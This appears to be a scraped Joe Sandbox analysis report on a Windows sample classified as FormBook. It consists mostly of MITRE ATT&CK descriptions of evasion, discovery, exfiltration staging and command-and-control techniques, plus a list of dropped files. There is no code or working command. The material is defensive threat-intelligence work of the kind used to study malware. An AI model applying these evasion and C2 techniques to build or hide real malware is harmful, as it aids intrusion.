Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CZyOWoN2hiszA6d.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CZyOWoN2hiszA6d.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dacYzRiJuWECy.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3x000ooz.nxk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgylplwg.zz2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fgmhkcww.aa2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ircswx3g.zgm.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itqqbifv.wpa.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jv2lgo0n.2w4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ocvbi5n5.ohl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbppsakb.qy2.ps1

Windows Analysis Report
CZyOWoN2hiszA6d.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre